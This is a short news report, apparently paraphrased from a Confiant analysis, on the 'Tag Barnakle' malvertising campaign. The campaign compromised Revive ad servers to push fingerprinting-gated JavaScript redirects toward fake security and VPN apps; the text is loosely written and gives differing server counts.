Malvertising campaign tracked as “Tag Barnakle” has been behind the breach of more than 120 ad servers over the past year to sneakily inject code in an attempt to serve malicious advertisements that redirect users to rogue websites, thus exposing victims to scamware or malware.

Operators infiltrating the ad-tech ecosystem using “convincing personas” to buy space on legitimate websites for running the malicious ads, Tag Barnakle is “able to bypass this initial hurdle completely by going straight for the jugular — mass compromise of ad serving infrastructure,”

Having poisoned nearly 60-70 AD servers, The latest slew of attacks is no different, although the adversaries appear to have upgraded their tools to target mobile devices as well. Tag Barnakle is now pushing mobile targeted campaigns,

The websites that receive an ad through a hacked server carries out client-side fingerprinting to deliver a second-stage JavaScript payload click tracker ads when certain checks are satisfied, that then redirect users to malicious websites, aiming to lure the visitors to an app store listing for fake security, safety, or VPN apps, which come with hidden subscription costs or hijack the traffic for other nefarious purposes.

Given that Revive is used by a good number of ad platforms and media companies, Confiant pegs the reach of Tag Barnakle in the range of “tens if not hundreds of millions of devices.” an conservative estimate